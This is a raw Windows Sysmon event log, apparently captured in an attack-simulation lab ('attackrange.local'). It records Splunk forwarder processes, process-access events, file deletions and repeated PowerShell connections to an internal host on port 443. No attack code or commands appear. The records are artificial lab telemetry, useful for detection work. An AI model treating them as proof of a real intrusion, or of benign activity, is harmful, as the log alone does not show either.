21:55:27.590{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.590{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.590{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.590{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82CF-613A-B996-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.590{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82CF-613A-B996-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.575{B81B27B7-82CF-613A-B996-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035127759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.044{B81B27B7-82CE-613A-B896-03000000C801}6125356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035127758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:51.309{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62069-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.012{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F736D08E5A6E4948502DEE066A5A544F,SHA256=EA2D576136446BC046C2CBB28A3C93ACC9D9CF0920FB52CAD7E6B8B08E7B1545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:28.042{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5976DEC1079DE0D68D01C01A3E721C2,SHA256=6D2D2BFF3764A19427E966171B6F858586ED02792C0992B452422DD8EC7DD8F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:29.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D580FC96BA801A931CD39DA3E5B077E0,SHA256=4526109E3F2272863784DB69FADC9E11E452D2ABD0057DABE5387E4B4E8592FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:30.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E106998227950670EA636C5EEAF914F5,SHA256=40048A08EA1E9F9124A42556B275DAF3CA44D1E1DDB18F3C21702CB8C8B753EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:31.188{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4895E14C2D9C975638463989A41DE0B3,SHA256=EA59FFD2776CE5E9319A871C895687ADAEB50D3A92BE65E230B794BD59BCB640,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:31.106{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5607BF37B3EC857F527934F0D74892AD,SHA256=FDC50DF7FA8152BF21C69A1D09BF1E5FFF2C4293C39DF04D99D3C3A7719700E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:32.787{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF724d3d9f.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.322{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62071-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:56.283{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62070-false10.0.1.12-8000- 23542300x800000000000000035127775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:32.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C220263A558107422C4FCCAA0F25DBA9,SHA256=6C019610D13C0C6B20BCF71B3940530C2821443CBF3DEA8498B2223B11D0055A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:33.140{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A0367312C9B765C27FEB114EF09E876,SHA256=5053723F6EAA7DB9CDF6BBDA7B77D7626A1C49C474D0D565E04287E13328F8E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:34.170{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4A722051605C16DD114A80424BE2E6F,SHA256=AA8F041313326BC7D8690A2670E3498C9092EDA34DB3A23B8F82C1CE52CAE6AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:35.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D1646DA066819A64F37BE7A83DB194F5,SHA256=7A82DBDC2CB556819C66725E40C3B211D96B46117D59D127E49C948562170EBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:35.202{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00D4507993F0A6CFBA15A90FD5444370,SHA256=1C9DD406B3600706947833F7918A430D25953CAEA03085C1546D89701E72BE9C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:00.334{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62072-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:36.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=580079ACE9363CB12DD860670347FBA1,SHA256=8219DE07135BEB261958AA597C49283F353274B7DD37973441B7DA86952DF2C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:37.981{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E3D6BFBB36F592121527F5E3E3B9FD67,SHA256=9076CE23F138B4A3AEA8CB301A4304CB91300D1CB2A6B9D609CC1C9345ADAE27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:37.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BCCE0E01CF9A4F0041231C276ADD6DD,SHA256=DB6961BBC6EDF8551E736165450ECC62DF41309E2A7E4BF8F2FF92CB94F97503,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:02.231{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62073-false10.0.1.12-8000- 23542300x800000000000000035127787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:38.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E17AC27EE16708857A8C9F0179060F,SHA256=3E554AAA1C2169E44F475BB41E9D907F058BCB9ADAE67EA951915DEBAA2AFCC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:04.345{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62074-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:39.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C5144509E521CB3CFF41EB5245BD21E2,SHA256=1027686CE0AE649F6841AC7D667062F42DE6621A66BAEFB75500623244A035DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:39.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EAD400E9586B63E110D49E7F35667BE,SHA256=9D34E8966A28B712F3F3407C730630BE54BE6A578996DFEDF0A57A73314249F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.817{B81B27B7-82DC-613A-BA96-03000000C801}15843324C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.648{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82DC-613A-BA96-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.648{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.648{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.648{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.648{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.648{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-82DC-613A-BA96-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.648{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82DC-613A-BA96-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.634{B81B27B7-82DC-613A-BA96-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 